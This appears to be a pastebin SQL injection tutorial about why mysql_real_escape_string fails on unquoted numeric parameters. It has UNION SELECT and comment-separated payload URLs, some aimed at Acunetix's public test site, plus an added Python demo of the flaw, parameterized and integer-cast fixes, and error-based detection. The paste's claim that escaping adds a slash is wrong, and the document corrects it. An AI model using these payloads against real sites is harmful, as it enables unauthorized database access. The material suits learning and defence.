ak47suk1

sql bosan2

Jan 18th, 2011
Example query strings

www.example.tld/articles.php?id=1'

www.example.tld/articles.php?id='1'
...
If you use mysql_real_escape_string it becomes like this

www.example.tld/articles.php?id=1/'

www.example.tld/articles.php?id=/'1/'

Example attack

www.example.com/articles.php?id=1' union select 0 --

If the 'id' variable has already been filtered with mysql_real_escape_string(), the URL will be rendered as

www.example.com/articles.php?id=1'/ union select 0 --

Example attack that may bypass mysql_real_escape_string

www.example.com/articles.php?id=1/**/and/**/66=77/**/union/**/select/**/0--

Real web application attack. This site is a test site built by the Acunetix developers as an example target and demo. You are not breaking the law if you practice SQL injection on this site.

http://testphp.vulnweb.com/artists.php?artist=1'

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/default/htdocs/artists.php on line 62

Perhaps it is protected by mysql_real_escape_string? So it can't be broken into, right? But is that really so?

http://testphp.vulnweb.com/artists.php?artist=1/**/and/**/2=3/**/union/**/all/**/select/**/0,0x68616920657a61696e69,2
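The reason the comment-separated payload above gets past mysql_real_escape_string is not a weakness in the function: it only escapes quote, backslash and a few control characters (with a backslash prefix, so a quote becomes \' rather than the /' written above), and a payload with no such characters passes through untouched. When the escaped value is then glued into an unquoted numeric context such as WHERE id = ..., the database reads it as SQL. The following is an added example, not code from the paste; it uses SQLite in place of MySQL, a constructed approximation of the escape function, and constructed table data, and shows the escape-then-interpolate pattern beside the two defences that actually hold (a bound parameter, or an integer cast before the value reaches the query).

```python
import sqlite3

# Added example (not from the paste): why quote-escaping does not protect an
# unquoted numeric parameter, and what does. SQLite stands in for MySQL here.

PAGE_PAYLOAD_QUOTE = "1'"
# Same shape as the paste's comment-separated payload; it contains no quote
# characters, so an escaping function has nothing to escape. Constructed here.
PAGE_PAYLOAD_COMMENTS = "1/**/and/**/2=3/**/union/**/all/**/select/**/0,1,2"


def escape_like_mysql(value: str) -> str:
    """Approximation of mysql_real_escape_string (constructed here, not the
    real client call): each quote, backslash, NUL, newline, CR and Ctrl-Z is
    prefixed with a backslash. Note the prefix is a backslash, not a slash."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"',
             "\0": "\\0", "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def build_db() -> sqlite3.Connection:
    """In-memory table standing in for the articles table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                     [(1, "first", "hello"), (2, "second", "world")])
    return conn


def lookup_escaped_unquoted(conn, user_id: str):
    """The pattern the paste is criticising: the value is escaped, then glued
    into the SQL text in a numeric (unquoted) context."""
    sql = "SELECT id, title, body FROM articles WHERE id = " + escape_like_mysql(user_id)
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id: str):
    """Fix 1: bind the value. The driver sends it as data, never as SQL, so
    comments and keywords inside it are just characters that match no row."""
    return conn.execute(
        "SELECT id, title, body FROM articles WHERE id = ?", (user_id,)).fetchall()


def lookup_int_cast(conn, user_id: str):
    """Fix 2 for numeric ids: reject anything that is not an integer before it
    gets near the query (in PHP this is an (int) cast or a ctype_digit check)."""
    try:
        n = int(user_id, 10)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, title, body FROM articles WHERE id = ?", (n,)).fetchall()


def run_demo():
    conn = build_db()
    results = {}
    # A stray quote is escaped to 1\' and yields a syntax error: the warning
    # seen on the test site, which also tells a visitor that escaping is in play.
    try:
        lookup_escaped_unquoted(conn, PAGE_PAYLOAD_QUOTE)
        results["quote_escaped"] = "no error"
    except sqlite3.OperationalError:
        results["quote_escaped"] = "sql error"
    # The comment-separated payload survives escaping unchanged and is executed:
    # the returned row (0, 1, 2) comes from the injected SELECT, not the table.
    results["escape_noop"] = escape_like_mysql(PAGE_PAYLOAD_COMMENTS) == PAGE_PAYLOAD_COMMENTS
    results["comments_escaped"] = lookup_escaped_unquoted(conn, PAGE_PAYLOAD_COMMENTS)
    # Both real fixes treat the same string as a value and return nothing.
    results["comments_param"] = lookup_parameterized(conn, PAGE_PAYLOAD_COMMENTS)
    results["comments_int"] = lookup_int_cast(conn, PAGE_PAYLOAD_COMMENTS)
    # Legitimate input still works with the fixes.
    results["legit_param"] = lookup_parameterized(conn, "1")
    results["legit_int"] = lookup_int_cast(conn, "1")
    return results


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

Running the block shows the escaped quote ending in an SQL error (the test site's warning), the comment payload passing through escaping byte for byte and returning the injected row, and both fixes returning no rows for it while still finding article 1 for a normal id. The detection angle is the same error message: a database error in the response to a quoted parameter is the signal that values are being concatenated into SQL, whether or not an escaping call sits in front of it.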